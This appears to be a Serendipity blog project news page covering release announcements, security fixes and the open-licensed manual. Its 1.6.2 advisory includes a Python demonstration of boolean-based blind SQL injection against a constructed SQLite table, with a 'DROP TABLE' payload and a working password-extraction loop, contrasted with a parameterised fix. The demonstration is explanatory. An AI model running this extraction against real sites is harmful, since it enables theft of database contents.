Serendipity 1.7-rc1

The 1.7-rc1 that was published today has an issue with older Serendipity plugins present on existing installations, which prevents Serendipity 1.7 from operating properly. While we fix this issue for an upcoming rc2, the problematic rc1 has been removed for now.

Greetings from Garvin

Hey!

I finally made a short West Coast trip to the USA. I also visited Las Vegas, and guess what I found...

So there we have the place for our meetup; there's one in New York as well... ;-)

Best regards, Garvin

Serendipity 1.6.2 released

UPDATED: 2012-05-22 12:00 to clarify impact.

Good and bad things come in doubles, it seems. We are sorry to inform you that another security issue in Serendipity has been found by the High-Tech Bridge SA Security Research Lab (Advisory HTB23092). This issue has been reported today at 11:27 and we're happy to provide a quick fix for that.

You can either download the full 1.6.2 release, or apply this simple fix to the file include/functions_trackbacks.inc.php: diff on github.

The error is that input is not properly validated and can be used (when magic_quotes_gpc is off) to inject SQL into a query. Because our DB layer does not execute multiple statements, and the affected query is not used to produce any output, the impact first looked limited. Thanks to Pawel Golen it was made clear to us that the issue can in fact be used to remotely read the database through blind SQL injection: the attacker only learns a 0/1 answer per request, so deducing content takes a large number of queries and creates a lot of traffic, but it works. You should therefore definitely upgrade your installation.
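To make the corrected impact assessment concrete, here is an added example (not Serendipity code, and not the patch shipped in 1.6.2) that models the situation in Python with an in-memory SQLite database standing in for the blog's MySQL tables. The table and column names, the hypothetical `trackback_exists_*` lookup functions and the sample rows are all constructed for the example. It shows three things: a stacked-statement payload is refused by a DB layer that runs one statement at a time, exactly as the post says; a boolean-based blind injection nevertheless reads the `authors` table through a query whose result is never echoed, one bit at a time; and the same extraction loop learns nothing once the value is passed as a bound parameter. The leading quote in the payload is the character magic_quotes_gpc would have escaped. SQLite's `unicode()` is used where MySQL would use `ORD()`.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for a blog database (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE authors (username TEXT, password TEXT)")
    conn.execute("INSERT INTO authors VALUES ('admin', 's3cret')")
    conn.execute("CREATE TABLE trackbacks (id INTEGER, url TEXT)")
    conn.execute("INSERT INTO trackbacks VALUES (1, 'http://example.org/post/1')")
    return conn


def trackback_exists_vulnerable(conn, url):
    """Hypothetical vulnerable lookup: the request value is pasted into the SQL
    text. Only a yes/no is derived from the result; no row is ever echoed."""
    sql = "SELECT id FROM trackbacks WHERE url = '" + url + "'"
    return conn.execute(sql).fetchone() is not None


def trackback_exists_fixed(conn, url):
    """Hardened form: the value travels as a bound parameter, never as SQL."""
    row = conn.execute("SELECT id FROM trackbacks WHERE url = ?", (url,)).fetchone()
    return row is not None


def stacked_statement_rejected(conn):
    """A payload that appends a second statement. sqlite3, like the DB layer
    described in the post, refuses to run more than one statement, so this
    attack fails. That is not the same as the query being safe."""
    try:
        trackback_exists_vulnerable(conn, "'; DROP TABLE authors; --")
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return True
    return False


def oracle(conn, lookup, condition):
    """One request to the endpoint. The quote closes the string literal; the
    trailing ''=' re-balances it. Returns True iff the injected condition held."""
    return lookup(conn, "' OR (" + condition + ") AND ''='")


def blind_extract(conn, lookup, column="password", table="authors", max_len=64):
    """Boolean-based blind extraction of one value: first its length, then each
    character by binary search over 7-bit codes. Returns (value, requests_made)."""
    requests = 0

    def search(predicate_for, lo, hi):
        # smallest v in [lo, hi] for which "value > v" is false, i.e. the value
        nonlocal requests
        while lo < hi:
            mid = (lo + hi) // 2
            requests += 1
            if oracle(conn, lookup, predicate_for(mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = search(
        lambda v: f"(SELECT length({column}) FROM {table} LIMIT 1) > {v}", 0, max_len
    )
    chars = []
    for pos in range(1, length + 1):
        # SQLite unicode(); the MySQL equivalent is ORD()/ASCII()
        code = search(
            lambda v, p=pos: f"(SELECT unicode(substr({column},{p},1)) FROM {table} LIMIT 1) > {v}",
            0, 127,
        )
        chars.append(chr(code))
    return "".join(chars), requests


if __name__ == "__main__":
    db = make_db()
    print("stacked statement rejected:", stacked_statement_rejected(db))
    print("vulnerable lookup leaks:", blind_extract(db, trackback_exists_vulnerable))
    print("fixed lookup leaks:", blind_extract(db, trackback_exists_fixed))
```

Against the vulnerable lookup the loop recovers the six-character password with 48 requests (six to learn the length, seven per character), which is the "slow and noisy but effective" behaviour the post describes; a longer column or a real network round trip only changes the constant, not the outcome. Against the parameterised lookup every oracle answer is False, the length search settles on 0 after seven requests and nothing is recovered. Rejecting stacked statements, by itself, changed nothing.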

Serendipity is an open-source product with no specific funding, so we depend on nice people like High-Tech Bridge, Stefan Schurtz, Hanno Böck and all the others in the past to report issues to us. In turn we promise to fix them as quickly and transparently as possible.

Serendipity 1.6.1 released

Serendipity 1.6.1 has just been released. As usual you can simply download from s9y.org, extract the archive, upload it to your webspace and accept the upgrader when visiting your blog.

This release mainly addresses two security issues found by Stefan Schurtz (thanks a lot, again!). One is an XSS issue in the media database panel, the other an SQL injection in the media database section. Both issues can only be exploited if you are logged in to your blog and you click a specially crafted link. The SQL injection cannot be used to extract sensitive information from the database or to delete data.

Either way you are urged to upgrade your blog to the latest version. The development versions of 2.0 and 1.7 on github have these bugs fixed as well.

Other bugfixes in this version include:

  • Updated spamblock plugin for better word filtering in specific scenarios
  • Fixed draft/future entries preview links in backend
  • Fixed an issue where template-specific configuration options were not overwritten by the new global ones

You might also want to check out our quite stable 1.7 development version which uses Smarty3, or even our 2.0 development version which contains major rewrites so that Smarty is used in the backend!

Das Serendipity Handbuch / The Serendipity Manual

German version (translated to English)

The German "Serendipity Handbuch" was published by OpenSourcePress some time ago, and the publisher was kind enough to return the rights to the book's contents to us (thanks also to the energetic efforts of Dirk Deimeke and, of course, our great community).

This means the contents have now been published under a CC-BY-NC-SA license and can be freely read, extended and possibly also translated by the community (that is: YOU!). Most of the manual still applies today, but there is plenty of room for improvement.

Have a look at it here: Das Serendipity Handbuch. The files are in LaTeX format, so you need a working LaTeX environment to compile them. The .tex files are plain text, however, so don't be shy. :-)

We are currently considering which format makes the most sense for users and contributors as the final home for all of this. We would be happy to discuss it with you in the forum.


English version

The german "Serendipity Manual" was published by OpenSourcePress some time ago. They were so kind to revert the publishing license back to our project (thanks to the great work of Dirk Deimeke and kind people like you), so that we can now publish it under a CC-BY-NC-SA license, and let the community (read: YOU!) be able to read the documentation for free, contribute to it, and hopefully even translate it to other languages. Many aspects of the book are still up to date, but surely many improvements can now be made.

Check it out here: The Serendipity Book. The files are written in LaTeX format, so you need a working LaTeX environment to compile it as PDF or other variants, if you like. We are currently working out the best format to use in the future; if you want, you can help us discuss this on the forums.